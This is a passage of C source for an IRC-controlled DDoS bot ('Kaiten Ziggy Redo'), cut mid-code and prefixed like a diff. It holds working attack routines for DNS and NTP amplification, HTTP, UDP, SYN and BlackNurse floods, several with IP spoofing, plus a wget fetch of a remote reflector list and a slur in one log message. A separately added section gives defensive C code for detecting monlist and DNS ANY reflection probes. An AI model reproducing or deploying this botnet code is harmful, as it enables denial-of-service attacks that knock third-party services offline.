- if (spoofsm == 1) Send(sock, "NOTICE %s :Spoofs: %d.%d.%d.%d\n", sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]);
- else Send(sock, "NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n", sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]);
- }
- void version(int sock, char *sender, int argc, char **argv) {
- Send(sock, "NOTICE %s :Kaiten Ziggy Redo by Freak version 4.20", sender);
- }
- void nickc(int sock, char *sender, int argc, char **argv) {
- if (argc != 1) {
- Send(sock, "NOTICE %s :NICK <nick>\n", sender);
- return;
- }
- if (strlen(argv[1]) >= 10) {
- Send(sock, "NOTICE %s :Nick cannot be larger than 9 characters.\n", sender);
- return;
- }
- Send(sock, "NICK %s\n",argv[1]);
- }
- void disable(int sock, char *sender, int argc, char **argv) {
- if (argc != 1) {
- Send(sock, "NOTICE %s :DISABLE <pass>\n", sender);
- Send(sock, "NOTICE %s :Current status is: %s.\n", sender,disabled?"Disabled":"Enabled and awaiting orders");
- return;
- }
- if (disabled) {
- Send(sock, "NOTICE %s :Already disabled.\n", sender);
- return;
- }
- if (strlen(argv[1]) > 254) {
- Send(sock, "NOTICE %s :Password too long! > 254\n", sender);
- return;
- }
- disabled=1;
- memset(dispass,0,256);
- strcpy(dispass,argv[1]);
- Send(sock, "NOTICE %s :Disable sucessful.\n");
- }
- void enable(int sock, char *sender, int argc, char **argv) {
- if (argc != 1) {
- Send(sock, "NOTICE %s :ENABLE <pass>\n", sender);
- Send(sock, "NOTICE %s :Current status is: %s.\n", sender,disabled?"Disabled":"Enabled and awaiting orders");
- return;
- }
- if (!disabled) {
- Send(sock, "NOTICE %s :Already enabled.\n", sender);
- return;
- }
- if (strcasecmp(dispass,argv[1])) {
- Send(sock, "NOTICE %s :Wrong password\n", sender);
- return;
- }
- disabled=0;
- Send(sock, "NOTICE %s :Password correct.\n", sender);
- }
- void spoof(int sock, char *sender, int argc, char **argv) {
- char ip[256];
- int i, num;
- unsigned long uip;
- if (argc != 1) {
- Send(sock, "NOTICE %s :Removed all spoofs\n", sender);
- spoofs=0;
- spoofsm=0;
- return;
- }
- if (strlen(argv[1]) > 16) {
- Send(sock, "NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n", sender);
- return;
- }
- strcpy(ip,argv[1]);
- if (ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0;
- for (i=0, num=1;i<strlen(ip);i++) if (ip[i] == '.') num++;
- num=-(num-4);
- for (i=0;i<num;i++) strcat(ip,".0");
- uip=inet_network(ip);
- if (num == 0) spoofsm=1;
- else spoofsm=pow(256,num);
- spoofs=uip;
- }
- /*struct iphdr {
- unsigned int ihl:4, version:4;
- unsigned char tos;
- unsigned short tot_len;
- unsigned short id;
- unsigned short frag_off;
- unsigned char ttl;
- unsigned char protocol;
- unsigned short check;
- unsigned long saddr;
- unsigned long daddr;
- };*/
- /*struct udphdr {
- unsigned short source;
- unsigned short dest;
- unsigned short len;
- unsigned short check;
- };*/
- struct tcphdr {
- unsigned short source;
- unsigned short dest;
- unsigned long seq;
- unsigned long ack_seq;
- unsigned short res1:4, doff:4;
- unsigned char fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1;
- unsigned short window;
- unsigned short check;
- unsigned short urg_ptr;
- };
- struct send_tcp {
- struct iphdr ip;
- struct tcphdr tcp;
- char buf[20];
- };
- struct pseudo_header {
- unsigned int source_address;
- unsigned int dest_address;
- unsigned char placeholder;
- unsigned char protocol;
- unsigned short tcp_length;
- struct tcphdr tcp;
- char buf[20];
- };
- unsigned int host2ip(char *sender,char *hostname) {
- static struct in_addr i;
- struct hostent *h;
- if((i.s_addr = inet_addr(hostname)) == -1) {
- if((h = gethostbyname(hostname)) == NULL) {
- Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname);
- exit(0);
- }
- bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
- }
- return i.s_addr;
- }
- static uint32_t Q[4096], c = 362436;
- struct list
- {
- struct sockaddr_in data;
- char domain[512];
- int line;
- struct list *next;
- struct list *prev;
- };
- struct list *head;
- struct thread_data{
- int thread_id;
- struct list *list_node;
- struct sockaddr_in sin;
- int port;
- };
- struct DNS_HEADER
- {
- unsigned short id; // identification number
- unsigned char rd :1; // recursion desired
- unsigned char tc :1; // truncated message
- unsigned char aa :1; // authoritive answer
- unsigned char opcode :4; // purpose of message
- unsigned char qr :1; // query/response flag
- unsigned char rcode :4; // response code
- unsigned char cd :1; // checking disabled
- unsigned char ad :1; // authenticated data
- unsigned char z :1; // its z! reserved
- unsigned char ra :1; // recursion available
- unsigned short q_count; // number of question entries
- unsigned short ans_count; // number of answer entries
- unsigned short auth_count; // number of authority entries
- unsigned short add_count; // number of resource entries
- };
- //Constant sized fields of query structure
- struct QUESTION
- {
- unsigned short qtype;
- unsigned short qclass;
- };
- //Constant sized fields of the resource record structure
- struct QUERY
- {
- unsigned char *name;
- struct QUESTION *ques;
- };
- void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)
- {
- int lock = 0 , i;
- strcat((char*)host,".");
- for(i = 0 ; i < strlen((char*)host) ; i++)
- {
- if(host[i]=='.')
- {
- *dns++ = i-lock;
- for(;lock<i;lock++)
- {
- *dns++=host[lock];
- }
- lock++; //or lock=i+1;
- }
- }
- *dns++='\0';
- }
- void init_rand(uint32_t x)
- {
- int i;
- Q[0] = x;
- Q[1] = x + PHI;
- Q[2] = x + PHI + PHI;
- for (i = 3; i < 4096; i++)
- Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
- }
- uint32_t rand_cmwc(void)
- {
- uint64_t t, a = 18782LL;
- static uint32_t i = 4095;
- uint32_t x, r = 0xfffffffe;
- i = (i + 1) & 4095;
- t = a * Q[i] + c;
- c = (t >> 32);
- x = t + c;
- if (x < c) {
- x++;
- c++;
- }
- return (Q[i] = r - x);
- }
- void setup_udp_header(struct udphdr *udph)
- {
- }
- void *flood(void *par1)
- {
- struct thread_data *td = (struct thread_data *)par1;
- fprintf(stdout, "Thread %d started\n", td->thread_id);
- char strPacket[MAX_PACKET_SIZE];
- int iPayloadSize = 0;
- struct sockaddr_in sin = td->sin;
- struct list *list_node = td->list_node;
- int iPort = td->port;
- int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
- if(s < 0)
- {
- fprintf(stderr, "Could not open raw socket. You need to be root!\n");
- exit(-1);
- }
- //init random
- init_rand(time(NULL));
- // Clear the data
- memset(strPacket, 0, MAX_PACKET_SIZE);
- // Make the packet
- struct iphdr *iph = (struct iphdr *) &strPacket;
- iph->ihl = 5;
- iph->version = 4;
- iph->tos = 0;
- iph->tot_len = sizeof(struct iphdr) + 38;
- iph->id = htonl(54321);
- iph->frag_off = 0;
- iph->ttl = MAXTTL;
- iph->protocol = IPPROTO_UDP;
- iph->check = 0;
- iph->saddr = inet_addr("192.168.3.100");
- iPayloadSize += sizeof(struct iphdr);
- struct udphdr *udph = (struct udphdr *) &strPacket[iPayloadSize];
- udph->source = htons(iPort);
- udph->dest = htons(53);
- udph->check = 0;
- iPayloadSize += sizeof(struct udphdr);
- struct DNS_HEADER *dns = (struct DNS_HEADER *) &strPacket[iPayloadSize];
- dns->id = (unsigned short) htons(rand_cmwc());
- dns->qr = 0; //This is a query
- dns->opcode = 0; //This is a standard query
- dns->aa = 0; //Not Authoritative
- dns->tc = 0; //This message is not truncated
- dns->rd = 1; //Recursion Desired
- dns->ra = 0; //Recursion not available! hey we dont have it
- dns->z = 0;
- dns->ad = 0;
- dns->cd = 0;
- dns->rcode = 0;
- dns->q_count = htons(1); //we have only 1 question
- dns->ans_count = 0;
- dns->auth_count = 0;
- dns->add_count = htons(1);
- iPayloadSize += sizeof(struct DNS_HEADER);
- sin.sin_port = udph->source;
- iph->saddr = sin.sin_addr.s_addr;
- iph->daddr = list_node->data.sin_addr.s_addr;
- iph->check = ccsum ((unsigned short *) strPacket, iph->tot_len >> 1);
- char strDomain[512];
- int i;
- int j = 0;
- int iAdditionalSize = 0;
- while(1)
- {
- if(j==2){
- usleep(100);
- j=0;
- }
- //set the next node
- list_node = list_node->next;
- //Clear the old domain and question
- memset(&strPacket[iPayloadSize + iAdditionalSize], 0, iAdditionalSize+256);
- //add the chosen domain and question
- iAdditionalSize = 0;
- unsigned char *qname = (unsigned char*) &strPacket[iPayloadSize + iAdditionalSize];
- strcpy(strDomain, list_node->domain);
- ChangetoDnsNameFormat(qname, strDomain);
- //printf("!!%s %d\n", list_node->domain, list_node->line);
- iAdditionalSize += strlen(qname) + 1;
- struct QUESTION *qinfo = (struct QUESTION *) &strPacket[iPayloadSize + iAdditionalSize];
- qinfo->qtype = htons(255); //type of the query , A , MX , CNAME , NS etc
- qinfo->qclass = htons(1);
- iAdditionalSize += sizeof(struct QUESTION);
- strPacket[iPayloadSize + iAdditionalSize] = 0x00;
- strPacket[iPayloadSize + iAdditionalSize + 1] = 0x00;
- strPacket[iPayloadSize + iAdditionalSize + 2] = 0x29;
- strPacket[iPayloadSize + iAdditionalSize + 3] = 0x23;
- strPacket[iPayloadSize + iAdditionalSize + 4] = 0x28;
- strPacket[iPayloadSize + iAdditionalSize + 5] = 0x00;
- strPacket[iPayloadSize + iAdditionalSize + 6] = 0x00;
- strPacket[iPayloadSize + iAdditionalSize + 7] = 0x00;
- strPacket[iPayloadSize + iAdditionalSize + 8] = 0x00;
- strPacket[iPayloadSize + iAdditionalSize + 9] = 0x00;
- strPacket[iPayloadSize + iAdditionalSize + 10] = 0x00;
- strPacket[iPayloadSize + iAdditionalSize + 11] = 0x00;
- iAdditionalSize += 11;
- //set new node data
- iph->daddr = list_node->data.sin_addr.s_addr;
- udph->len= htons((iPayloadSize + iAdditionalSize) - sizeof(struct iphdr));
- iph->tot_len = iPayloadSize + iAdditionalSize;
- udph->source = htons(rand_cmwc() & 0xFFFF);
- iph->check = ccsum ((unsigned short *) strPacket, iph->tot_len >> 1);
- //send
- for(i = 0; i < PACKETS_PER_RESOLVER; i++)
- {
- sendto(s, strPacket, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
- }
- j++;
- }
- }
- void ParseResolverLine(char *strLine, int iLine)
- {
- char caIP[32] = "";
- char caDNS[512] = "";
- int i;
- char buffer[512] = "";
- int moved = 0;
- for(i = 0; i < strlen(strLine); i++)
- {
- if(strLine[i] == ' ' || strLine[i] == '\n' || strLine[i] == '\t')
- {
- moved++;
- continue;
- }
- if(moved == 0)
- {
- caIP[strlen(caIP)] = (char) strLine[i];
- }
- else if(moved == 1)
- {
- caDNS[strlen(caDNS)] = (char) strLine[i];
- }
- }
- //printf("Found resolver %s, domain %s!\n", caIP, caDNS);
- if(head == NULL)
- {
- head = (struct list *)malloc(sizeof(struct list));
- bzero(&head->data, sizeof(head->data));
- head->data.sin_addr.s_addr=inet_addr(caIP);
- head->data.sin_port=htons(53);
- strcpy(head->domain, caDNS);
- head->line = iLine;
- head->next = head;
- head->prev = head;
- }
- else
- {
- struct list *new_node = (struct list *)malloc(sizeof(struct list));
- memset(new_node, 0x00, sizeof(struct list));
- new_node->data.sin_addr.s_addr=inet_addr(caIP);
- new_node->data.sin_port=htons(53);
- strcpy(new_node->domain, caDNS);
- new_node->prev = head;
- head->line = iLine;
- new_node->next = head->next;
- head->next = new_node;
- }
- }
- void dnsamp(int sockfd, char *sender, int argc, char **argv)
- {
- if (mfork(sender) != 0) return;
- if(argc < 4)
- {
- Send(sock, "NOTICE %s :DNSAMP <IP> <port> <reflection file url> <threads> <time>\n", sender);
- exit(-1);
- }
- char *command[128];
- sprintf(command,"wget \"");
- strcat(command, argv[3]);
- strcat(command,"\" -q -O DNS.txt");
- system(command);
- head = NULL;
- char *strLine = (char *) malloc(256);
- strLine = memset(strLine, 0x00, 256);
- char strIP[32] = "";
- char strDomain[256] = "";
- int iLine = 0; // 0 = ip, 1 = domain.
- FILE *list_fd = fopen("DNS.txt", "r");
- while(fgets(strLine, 256, list_fd) != NULL)
- {
- ParseResolverLine(strLine, iLine);
- iLine++;
- }
- int i = 0;
- int num_threads = atoi(argv[4]);
- struct list *current = head->next;
- pthread_t thread[num_threads];
- struct sockaddr_in sin;
- sin.sin_family = AF_INET;
- sin.sin_port = htons(0);
- sin.sin_addr.s_addr = inet_addr(argv[1]);
- struct thread_data td[num_threads];
- int iPort = atoi(argv[2]);
- printf("Target: %s:%d\n", argv[1], iPort);
- for(i = 0; i < num_threads; i++)
- {
- td[i].thread_id = i;
- td[i].sin= sin;
- td[i].list_node = current;
- td[i].port = iPort;
- pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
- }
- Send(sock, "NOTICE %s :DNS amp attacking %s\n", sender,argv[1]);
- fprintf(stdout, "Starting Flood... Nigga!!\n");
- if(argc > 4)
- {
- sleep(atoi(argv[5]));
- }
- else
- {
- while(1)
- {
- sleep(1);
- }
- }
- exit(1);
- }
- void sendHTTP(int sock, char *sender, int argc, char **argv) {
- unsigned char *url;
- int end_time;
- if (mfork(sender) != 0) return;
- if (argc < 2) {
- Send(sock, "NOTICE %s :HTTPFLOOD <url> <secs>\n", sender);
- exit(1);
- }
- url = argv[1];
- end_time = atoi(argv[2]);
- int end = time(NULL) + end_time;
- char *UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
- char *command[128];
- Send(sock, "NOTICE %s :HTTP Flooding %s\n", sender, url);
- while(end > time(NULL))
- {
- UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
- sprintf(command,"wget -U \"");
- strcat(command, UA);
- strcat(command,"\" -q ");
- strcat(command, url);
- strcat(command, " -O /dev/null &");
- system(command);
- }
- exit(1);
- }
- //Struct for UDP Packet
- struct udpheader{
- unsigned short int udp_sourcePortNumber;
- unsigned short int udp_destinationPortNumber;
- unsigned short int udp_length;
- unsigned short int udp_checksum;
- };
- // Struct for NTP Request packet. Same as req_pkt from ntpdc.h, just a little simpler
- struct ntpreqheader {
- unsigned char rm_vn_mode; /* response, more, version, mode */
- unsigned char auth_seq; /* key, sequence number */
- unsigned char implementation; /* implementation number */
- unsigned char request; /* request number */
- unsigned short err_nitems; /* error code/number of data items */
- unsigned short mbz_itemsize; /* item size */
- char data[40]; /* data area [32 prev](176 byte max) */
- unsigned long tstamp; /* time stamp, for authentication */
- unsigned int keyid; /* encryption key */
- char mac[8]; /* (optional) 8 byte auth code */
- };
- void ntp(int sock, char *sender, int argc, char **argv) {
- unsigned long secs;
- int i,get;
- if (mfork(sender) != 0) return;
- time_t start=time(NULL);
- if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
- if (argc < 3) {
- Send(sock, "NOTICE %s :NTP <target> <ntp server> <secs>\n", sender);
- exit(1);
- }
- secs = atol(argv[3]);
- int status; // Maintains the return values of the functions
- struct iphdr *ip; // Pointer to ip header struct
- struct udpheader *udp; // Pointer to udp header struct
- struct ntpreqheader *ntp; // Pointer to ntp request header struct
- int sockfd; // Maintains the socket file descriptor
- int one = 1; // Sets the IP_HDRINCL socket option to tell the kernel that the headers are already included in the packets.
- struct sockaddr_in dest; // Maintains the data of the destination address
- char packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ]; //Packet itself
- // Parameters check
- if( argc != 3){
- exit(1);
- }
- // Create a socket and tells the kernel that we want to use udp as layer 4 protocol
- sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
- if (sockfd == -1){
- printf("Error on initializing the socket\n");
- exit(1);
- }
- //Sets the option IP_HDRINCL
- status = setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);
- if (status == -1){
- printf("Error on setting the option HDRINCL on socket\n");
- exit(1);
- }
- //"Zeroes" all the packet stack
- memset( packet, 0, sizeof(packet) );
- //Mounts the packet headers
- // [ [IP HEADER] [UDP HEADER] [NTP HEADER] ] --> Victory!!!
- ip = (struct iphdr *)packet;
- udp = (struct udpheader *) (packet + sizeof(struct iphdr) );
- ntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );
- //Fill the IP Header
- ip->version = 4; //IPv4
- ip->ihl = 5; //Size of the Ip header, minimum 5
- ip->tos = 0; //Type of service, the default value is 0
- ip->tot_len = sizeof(packet); //Size of the datagram
- ip->id = htons(1234); //Identification number
- ip->frag_off = 0; //Flags, zero represents reserved
- ip->ttl = 255; //Time to Live. Maximum of 255
- ip->protocol = IPPROTO_UDP; //Sets the UDP as the next layer protocol
- ip->check = 0; //Checksum.
- ip->saddr = inet_addr( argv[1] ); //Source ip ( spoofing goes here)
- //Fills the UDP Header
- udp->udp_sourcePortNumber = htons( atoi( "123" ) ); //Source Port
- udp->udp_destinationPortNumber = htons(atoi("123")) ; //Destination Port
- udp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); //Length of the packet
- udp->udp_checksum = 0; //Checksum
- //Calculate the checksums
- //ip->check = ((unsigned short *)packet, ip->tot_len); //Calculate the checksum for iP header
- //Sets the destination data
- dest.sin_family = AF_INET; // Address Family Ipv4
- dest.sin_port = htons (atoi( "123" ) ) ; // Destination port
- //Fills the NTP header
- //Ok, here is the magic, we need to send a request ntp packet with the modes and codes sets for only MON_GETLIST
- //To do this we can import the ntp_types.h and use its structures and macros. To simplify i've created a simple version of the
- // ntp request packet and hardcoded the values for the fields to make a "MON_GETLIST" request packet.
- // To learn more, read this: http://searchcode.com/codesearch/view/451164#127
- ntp->rm_vn_mode=0x17; //Sets the response bit to 0, More bit to 0, Version field to 2, Mode field to 7
- ntp->implementation=0x03; //Sets the implementation to 3
- ntp->request=0x2a; //Sets the request field to 42 ( MON_GETLIST )
- //All the other fields of the struct are zeroed
- ip->daddr = inet_addr( argv[2] ); //Destination IP
- dest.sin_addr.s_addr = inet_addr( argv[2] ); // Destination address the packet is sent to
- Send(sock, "NOTICE %s :NTP amp attacking %s\n", sender, argv[1]);
- for (;;) {
- status = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) );
- if(status <0){
- printf("Failed to send the packets\n");
- exit(1);
- }
- if (i >= 50) {
- if (time(NULL) >= start+secs) {
- exit(0);
- }
- i=0;
- }
- i++;
- }
- }
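A defender-side counterpart to the two reflection request builders above (`flood()` for DNS and `ntp()` for NTP), added here and not part of the paste: a bounds-checked classifier that recognises those request shapes in captured UDP payloads. The function names, the 512-byte EDNS threshold and the sample packets are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

enum probe_kind { PROBE_NONE, PROBE_NTP_MONLIST, PROBE_DNS_ANY_EDNS };

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* NTP mode 7 request header: byte 0 = R|M|VN(3)|MODE(3), byte 3 = request code. */
int is_ntp_monlist_request(const uint8_t *p, size_t len)
{
    if (len < 8) return 0;             /* mode 7 fixed header is 8 bytes */
    if (p[0] & 0x80) return 0;         /* response bit set: a reply, not a request */
    if ((p[0] & 0x07) != 7) return 0;  /* not a private-mode (7) packet */
    return p[3] == 0x2a;               /* request code 42, the value ntp() sets */
}

/* Returns the EDNS0 UDP size advertised by a single-question ANY query,
 * or 0 if the payload is not such a query or its first additional record
 * is not an OPT record. Every read is bounds-checked against len. */
uint16_t dns_any_query_edns_size(const uint8_t *p, size_t len)
{
    size_t off = 12;                                     /* fixed DNS header */
    if (len < 12) return 0;
    if (p[2] & 0x80) return 0;                           /* QR=1: a response */
    if (be16(p + 4) != 1) return 0;                      /* QDCOUNT must be 1 */
    if (be16(p + 6) != 0 || be16(p + 8) != 0) return 0;  /* ANCOUNT, NSCOUNT */
    for (;;) {                                           /* walk QNAME labels */
        uint8_t label;
        if (off >= len) return 0;                        /* truncated name */
        label = p[off];
        if (label == 0) { off++; break; }                /* root label ends it */
        if (label > 63) return 0;                        /* pointer or reserved */
        off += 1 + (size_t)label;
    }
    if (len - off < 4) return 0;                         /* QTYPE + QCLASS */
    if (be16(p + off) != 255) return 0;                  /* QTYPE ANY */
    off += 4;
    if (be16(p + 10) == 0) return 0;                     /* ARCOUNT: no OPT */
    if (len - off < 11) return 0;                        /* minimal OPT record */
    if (p[off] != 0 || be16(p + off + 1) != 41) return 0;/* root name, type OPT */
    return be16(p + off + 3);                            /* CLASS = UDP size */
}

/* dport is the UDP destination port of the captured datagram. */
enum probe_kind classify_udp_payload(uint16_t dport, const uint8_t *p, size_t len)
{
    if (dport == 123 && is_ntp_monlist_request(p, len))
        return PROBE_NTP_MONLIST;
    /* Assumption: flag ANY queries advertising more than the classic 512 bytes. */
    if (dport == 53 && dns_any_query_edns_size(p, len) > 512)
        return PROBE_DNS_ANY_EDNS;
    return PROBE_NONE;
}

/* Constructed sample payloads (not captured traffic). */
const uint8_t SAMPLE_NTP_MONLIST[8] = { 0x17, 0x00, 0x03, 0x2a, 0, 0, 0, 0 };
const uint8_t SAMPLE_NTP_CLIENT[48] = { 0x23 };          /* VN 4, mode 3 */
const uint8_t SAMPLE_DNS_ANY[] = {
    0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
    7, 'e', 'x', 'a', 'm', 'p', 'l', 'e', 3, 'c', 'o', 'm', 0,
    0x00, 0xff, 0x00, 0x01,                              /* ANY, IN */
    0x00, 0x00, 0x29, 0x23, 0x28, 0, 0, 0, 0, 0, 0       /* OPT, size 9000 */
};
const uint8_t SAMPLE_DNS_A[] = {
    0x56, 0x78, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    7, 'e', 'x', 'a', 'm', 'p', 'l', 'e', 3, 'c', 'o', 'm', 0,
    0x00, 0x01, 0x00, 0x01                               /* A, IN, no OPT */
};

int main(void)
{
    printf("ntp monlist: %d\n",
           classify_udp_payload(123, SAMPLE_NTP_MONLIST, sizeof SAMPLE_NTP_MONLIST));
    printf("ntp client:  %d\n",
           classify_udp_payload(123, SAMPLE_NTP_CLIENT, sizeof SAMPLE_NTP_CLIENT));
    printf("dns any:     %d\n",
           classify_udp_payload(53, SAMPLE_DNS_ANY, sizeof SAMPLE_DNS_ANY));
    printf("dns a:       %d\n",
           classify_udp_payload(53, SAMPLE_DNS_A, sizeof SAMPLE_DNS_A));
    return 0;
}
```

On a resolver or NTP server, a sustained rate of matches that all claim one source address is the reflection pattern; the classifier inspects only the first additional record, which is where an OPT record sits in the query shape shown in `flood()`.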
- void blacknurse(int sock, char *sender, int argc, char *argv[])
- {
- uint8_t pkt_template[] = {
- 0x03, 0x03, 0x0d, 0x33, 0x00, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x1c, 0x4a, 0x04, 0x00, 0x00,
- 0x40, 0x06, 0x20, 0xc5, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x00, 0x00, 0x00, 0x00,
- 0x00, 0x08, 0xef, 0xc1
- };
- uint8_t *pkt;
- struct addrinfo *ai, hints;
- const char *host;
- struct pollfd pfd;
- const size_t pkt_len = (sizeof pkt_template) / (sizeof pkt_template[0]);
- size_t i;
- int gai_err;
- int kindy;
- int x, secs,get;
- time_t start=time(NULL);
- if (mfork(sender) != 0) return;
- if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
- if (argc < 2) {
- Send(sock, "NOTICE %s :BLACKNURSE <target ip> <secs>", sender);
- exit(1);
- }
- host = argv[1];
- secs = argv[2];
- memset(&hints, 0, sizeof hints);
- hints.ai_family = AF_INET;
- if ((gai_err = getaddrinfo(host, NULL, &hints, &ai)) != 0) {
- fprintf(stderr, "Unable to use [%s]: %s\n", host,
- gai_strerror(gai_err));
- exit(1);
- }
- if ((kindy = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) {
- perror("socket");
- exit(1);
- }
- Send(sock, "NOTICE %s :Blacknursing %s", sender, host);
- pkt = pkt_template;
- pfd.fd = kindy;
- pfd.events = POLLOUT;
- for (;;) {
- for (i = 20; i < 20 + 8 + 4; i++) {
- pkt[i] = (uint8_t) rand();
- }
- if (sendto(kindy, pkt, pkt_len, 0,
- ai->ai_addr, ai->ai_addrlen) != (ssize_t) pkt_len) {
- if (errno == ENOBUFS) {
- poll(&pfd, 1, 1000);
- continue;
- }
- perror("sendto");
- break;
- }
- if (i >= 50) {
- if (time(NULL) >= start+secs) exit(0);
- x=0;
- }
- x++;
- }
- /* NOTREACHED */
- close(kindy);
- freeaddrinfo(ai);
- return;
- }
- void udp(int sock, char *sender, int argc, char **argv) {
- unsigned int port,i=0;
- unsigned long psize,target,secs;
- struct sockaddr_in s_in;
- struct iphdr *ip;
- struct udphdr *udp;
- char buf[1500],*str;
- int get;
- time_t start=time(NULL);
- if (mfork(sender) != 0) return;
- if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
- if (argc < 3) {
- Send(sock, "NOTICE %s :UDP <target> <port> <secs>\n", sender);
- exit(1);
- }
- target = host2ip(sender,argv[1]);
- port = atoi(argv[2]);
- secs = atol(argv[3]);
- ip=(void*)buf;
- udp=(void*)(buf+sizeof(struct iphdr));
- str=(void*)(buf+sizeof(struct iphdr)+sizeof(struct udphdr));
- memset(str,10,1500-(sizeof(struct iphdr)+sizeof(struct udphdr)));
- Send(sock, "NOTICE %s :Packeting %s.\n", sender,argv[1]);
- ip->ihl = 5;
- ip->version = 4;
- ip->tos = 0;
- ip->tot_len = 1500;
- ip->frag_off = 0;
- ip->protocol = 17;
- ip->ttl = 64;
- ip->daddr = target;
- udp->len = htons(psize);
- s_in.sin_family = AF_INET;
- s_in.sin_addr.s_addr = target;
- for (;;) {
- udp->source = rand();
- if (port) udp->dest = htons(port);
- else udp->dest = rand();
- udp->check = in_cksum((u_short *)buf,1500);
- ip->saddr = getspoof();
- ip->id = rand();
- ip->check = in_cksum((u_short *)buf,1500);
- s_in.sin_port = udp->dest;
- sendto(get,buf,1500,0,(struct sockaddr *)&s_in,sizeof(s_in));
- if (i >= 50) {
- if (time(NULL) >= start+secs) exit(0);
- i=0;
- }
- i++;
- }
- }
- void pan(int sock, char *sender, int argc, char **argv) {
- struct send_tcp send_tcp;
- struct pseudo_header pseudo_header;
- struct sockaddr_in sin;
- unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
- unsigned int psize=20, source, dest, check;
- unsigned long saddr, daddr,secs;
- int get;
- time_t start=time(NULL);
- if (mfork(sender) != 0) return;
- if (argc < 3) {
- Send(sock, "NOTICE %s :PAN <target> <port> <secs>\n", sender);
- exit(1);
- }
- if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
- {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
- daddr=host2ip(sender,argv[1]);
- secs=atol(argv[3]);
- Send(sock, "NOTICE %s :Panning %s.\n", sender,argv[1]);
- send_tcp.ip.ihl = 5;
- send_tcp.ip.version = 4;
- send_tcp.ip.tos = 16;
- send_tcp.ip.frag_off = 64;
- send_tcp.ip.ttl = 64;
- send_tcp.ip.protocol = 6;
- send_tcp.tcp.ack_seq = 0;
- send_tcp.tcp.doff = 10;
- send_tcp.tcp.res1 = 0;
- send_tcp.tcp.cwr = 0;
- send_tcp.tcp.ece = 0;
- send_tcp.tcp.urg = 0;
- send_tcp.tcp.ack = 0;
- send_tcp.tcp.psh = 0;
- send_tcp.tcp.rst = 0;
- send_tcp.tcp.fin = 0;
- send_tcp.tcp.syn = 1;
- send_tcp.tcp.window = 30845;
- send_tcp.tcp.urg_ptr = 0;
- dest=htons(atoi(argv[2]));
- while(1) {
- source=rand();
- if (atoi(argv[2]) == 0) dest=rand();
- saddr=getspoof();
- send_tcp.ip.tot_len = htons(40+psize);
- send_tcp.ip.id = rand();
- send_tcp.ip.saddr = saddr;
- send_tcp.ip.daddr = daddr;
- send_tcp.ip.check = 0;
- send_tcp.tcp.source = source;
- send_tcp.tcp.dest = dest;
- send_tcp.tcp.seq = rand();
- send_tcp.tcp.check = 0;
- sin.sin_family = AF_INET;
- sin.sin_port = dest;
- sin.sin_addr.s_addr = send_tcp.ip.daddr;
- send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
- check = rand();
- send_tcp.buf[9]=((char*)&check)[0];
- send_tcp.buf[10]=((char*)&check)[1];
- send_tcp.buf[11]=((char*)&check)[2];
- send_tcp.buf[12]=((char*)&check)[3];
- pseudo_header.source_address = send_tcp.ip.saddr;
- pseudo_header.dest_address = send_tcp.ip.daddr;
- pseudo_header.placeholder = 0;
- pseudo_header.protocol = IPPROTO_TCP;
- pseudo_header.tcp_length = htons(20+psize);
- bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
- bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
- send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
- sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
- if (a >= 50) {
- if (time(NULL) >= start+secs) exit(0);
- a=0;
- }
- a++;
- }
- close(get);
- exit(0);
- }
- void unknown(int sock, char *sender, int argc, char **argv) {
- int flag=1,fd,i;
- unsigned long secs;
- char *buf=(char*)malloc(9216);
- struct hostent *hp;
- struct sockaddr_in in;
- time_t start=time(NULL);
- if (mfork(sender) != 0) return;
- if (argc < 2) {
- Send(sock, "NOTICE %s :UNKNOWN <target> <secs>\n", sender);
